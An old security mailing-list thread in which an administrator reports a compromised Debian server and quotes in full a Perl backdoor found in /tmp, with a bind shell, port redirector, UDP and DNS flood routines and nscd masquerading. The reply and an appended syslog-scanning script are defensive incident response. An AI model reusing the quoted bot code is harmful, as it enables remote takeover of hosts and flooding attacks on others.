
Re: a weird script worm uploaded via php with debian 3.0 ?



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi

On Tuesday 10 June 2003 21:58, Robert Ebright wrote:

Have you copied the home directory of the user www-data to the new server? In 
Debian it is located in the root directory of the web server, so if you have 
copied the document root from the old server you have copied all the dot files 
for the user, and quite possibly you have copied the crontab file of www-data.

If you look at the syslog entries you can figure out how the worm replicates 
itself and how the rootkit is enabled.... ( only guessing )


> and under SYSLOG it starts
>
the system finds a crontab for the user www-data

user www-data has executed the command crontab -l

> syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)

and has replaced the file

> syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)

hummmmmmm, maybe he isn't very smart, www-data has done it again

> syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
> syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)

cron sees the new crontab file for www-data, reads the file, and executes the 
commands...
> syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
>

hummmmmmmmmmmmmmm, you have to figure out how /tmp/.nscdrecover has been 
copied there; it is difficult to say, but maybe another crontab entry of the 
user www-data starts the work....  who knows...


> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>

it sounds like a local exploit against nscd which is trying to get a root 
shell and put it on the wire....


> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
>         alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
>         $sin = $sa->accept or exit;
>         close($sa);
>         alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
>     foreach $s(@sock) {
>         $buf = <$s>; exit unless($buf);
>         print $sout $buf if($s eq $sin);
>         print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
>         alarm 60;
> use Socket;
>         socket(S, PF_INET, SOCK_STREAM, 0);
>         setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
>         bind(S, sockaddr_in($port, INADDR_ANY));
>         listen(S, 1);
>         accept(X, S);
>         close(S);
>         alarm 0;
>         open STDIN, "<&X";
>         open STDOUT, ">&X";
>         open STDERR, ">&X";
>         close X;
>         exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
>         $sock = IO::Socket::INET->new(Proto =>
>         'udp', PeerAddr => $host,
>         PeerPort => int(rand 65535))
>                     or exit;
>                     $sock->autoflush(1);        $SIG{ALRM} = sub { exit };
>         alarm 15 unless(alarm $time);
>         print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
>         $sock = new IO::Socket::INET->new(Proto
>         => 'udp', PeerAddr => $host,
>         PeerPort => 53) or exit;
>         $sock->autoflush(1);
>         $SIG{ALRM} = sub { exit };
>         alarm 15 unless(alarm $time);
> while(1) {
>         my $s = int(rand(89)+10);
>         my $r1 = int(rand(89)+10);
>         my $r2 = int(rand(89)+10);
>         my $r3 = int(rand(89)+10);
>         my $r4 = int(rand(89)+10);
> 
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, "</dev/null";
> open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
>         chop($string);
>         my ($pw, $cmd, $arg1, $arg2) = split "
>         ", $string;        next unless($cmd);
>         next unless($arg1);
>         next unless(crypt($pw, $pass) eq $pass);
>         if ($cmd eq "ping") {
>             my $bsock =
>             IO::Socket::INET->new(Proto =>
>             'udp', PeerAddr => $arg1,
>                   PeerPort => $arg2,
>                             ReuseAddr => 1) or
>                             next;
>                             print $bsock                            "pong
> ".`uname -mnrs`; close $bsock;
>         } elsif ($cmd eq "die") {
>             exit if(crypt($arg1, $pass) eq $pass);
>         } elsif ($cmd eq "redir") {
>             redir($arg1, $arg2) unless(fork);
>         } elsif ($cmd eq "shell") {
>             shell($arg1) unless(fork);
>         } elsif ($cmd eq "udp") {
>             udp($arg1, $arg2) unless(fork);
>         } elsif ($cmd eq "ddns") {
>             ddns($arg1, $arg2) unless(fork);
>         }
> }
>
>
>
> A little history is that my server was hacked
> with some trojan that was sending out SPAM and I
> did a fresh reinstall with debian so I could
> have automatic updates and the like. I copied
> over a few of the home directories from the old
> site. Then this all started after a user logged
> in on Friday June 6th, first login at 14:16 ending
> 14:24; the script starts at 14:27
>
>
> worldspe ftpd26405    pm6-s104.amazon. Fri Jun  6 15:06 - 15:06  (00:00)
> worldspe ftpd26325    pm6-s104.amazon. Fri Jun  6 14:51 - 14:51  (00:00)
> worldspe ftpd26315    pm6-s104.amazon. Fri Jun  6 14:49 - 14:49  (00:00)
> worldspe ftpd26291    pm6-s104.amazon. Fri Jun  6 14:43 - 14:44  (00:00)
> worldspe ftpd26183    pm6-s104.amazon. Fri Jun  6 14:16 - 14:24  (00:07)
>
> The question is could this have been started via a
> php script and if so what should I look for in
> order to neutralize it and communicate with this
> user?
> I already moved the /tmp file out.
>
> While grepping the php files I found nothing that
> had /tmp or ncsd listed in it at all. This is
> just kind of weird, and I was wondering if
> anybody could be of help. Also no other files or
> cgi-bin files were uploaded, so it might just be
> a coincidence, but my logic points to it being
> something that happened via something that was
> uploaded.

look carefully at the webserver access and error logs; maybe you have some 
buggy php code that allows remote execution of commands...

the crontab affair is a silly way of using www-data to get a local root 
shell on the wire so you can telnet to it and gain remote root access.

>
>
> I just don't know where this came from. I am
> running Debian 3.0 woody with all security
> update files. I ran rtkitchk and found nothing.
> So I'm really perplexed as to what could have got
> this script on the server. Any help would be
> greatly appreciated as I found nothing about
> this script by google.

hummmmmmmmmmmmmmm, look at the www-data home directory on the old and the new 
machine ( maybe the crontab was there in the hacked machine's www-data 
directory and it was not uploaded freshly to the new box ), and read the 
crontab man page...  in the meanwhile I would add the user www-data to 
/etc/cron.deny if I were you


Regards
Victor



- -- 
What nature doesn't give....
O'reilly & Associates won't lend you
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+5zyTEzqHF8R72ekRAvBNAJwNkpsXnTvHv5NM8qXeFWsyUq6kJwCeO5/b
bOqszSJYuRaxurdzhu9BGbA=
=BX70
-----END PGP SIGNATURE-----
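The two log signals Victor walks through in his reply, a `crontab ... REPLACE` done by the web-server account and a `CRON ... CMD` whose program lives in /tmp, can be pulled out of syslog mechanically. The script below is an added example and is not code from this thread or from Debian; it assumes the syslog line layout quoted in the message (the Debian 3.0 era vixie-cron format) and uses a constructed sample log modelled on those lines, a watched-account list (`www-data|nobody`) and a list of world-writable paths (`/tmp`, `/var/tmp`, `/dev/shm`) that are my choices, not the thread's. The last function checks a cron.deny-style file for an account, which is the mitigation the reply recommends.

```shell
#!/bin/sh
# Added example, not code from the thread: scan syslog for a crontab REPLACE by
# a web-server account and for cron jobs whose program runs from a temp or
# hidden path, then check whether an account is listed in cron.deny.
# Assumption: the syslog layout quoted in the thread, i.e.
#   "Mon DD HH:MM:SS host crontab[PID]: (user) REPLACE (user)" and
#   "Mon DD HH:MM:SS host /USR/SBIN/CRON[PID]: (user) CMD (command)".

# Constructed sample log, modelled on the lines quoted in the thread.
SAMPLE_FILE=$(mktemp)
cat > "$SAMPLE_FILE" <<'EOF'
Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
Jun  6 16:30:00 debian /USR/SBIN/CRON[26900]: (root) CMD (run-parts --report /etc/cron.hourly)
Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
Jun  6 17:05:00 debian crontab[27001]: (alice) REPLACE (alice)
EOF

# Print "Mon DD HH:MM:SS user REPLACE" for every crontab REPLACE made by one of
# the watched accounts. $1 = syslog file, $2 = ERE alternation of accounts that
# should never install a crontab, e.g. 'www-data|nobody' (my assumption).
find_crontab_replaces() {
    awk -v users="^($2)\$" '
        / crontab\[[0-9]+\]: \([^)]*\) REPLACE \(/ {
            u = $6; gsub(/[()]/, "", u)          # "(www-data)" -> "www-data"
            if (u ~ users) print $1, $2, $3, u, "REPLACE"
        }' "$1"
}

# Print "Mon DD HH:MM:SS user command" for every cron job whose program runs
# from /tmp, /var/tmp or /dev/shm, or from a dot-file (a hidden path such as
# the /tmp/.nscdrecover in the thread). $1 = syslog file.
find_suspicious_cron_cmds() {
    awk '
        /CRON\[[0-9]+\]: \([^)]*\) CMD \(/ {
            u = $6; gsub(/[()]/, "", u)
            cmd = $0; sub(/.* CMD \(/, "", cmd); sub(/\)$/, "", cmd)
            if (cmd ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\// || cmd ~ /\/\.[^\/.]/)
                print $1, $2, $3, u, cmd
        }' "$1"
}

# Succeed when account $2 is listed in the cron.deny-style file $1 (one name
# per line), which is what the reply recommends doing for www-data.
user_in_cron_deny() {
    grep -qx "$2" "$1"
}

echo "== crontab replaced by a watched account =="
find_crontab_replaces "$SAMPLE_FILE" 'www-data|nobody'
echo "== cron jobs running from a temp or hidden path =="
find_suspicious_cron_cmds "$SAMPLE_FILE"
```

On a real box point the functions at the rotated logs, e.g. `find_crontab_replaces /var/log/syslog.3 'www-data|nobody'`: a REPLACE by www-data that no administrator performed is the persistence event, and the matching CMD line names what it installed. Once the job is removed (Debian keeps per-user crontabs under /var/spool/cron/crontabs), listing www-data in /etc/cron.deny stops that account from installing another one; `user_in_cron_deny /etc/cron.deny www-data` verifies the entry.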


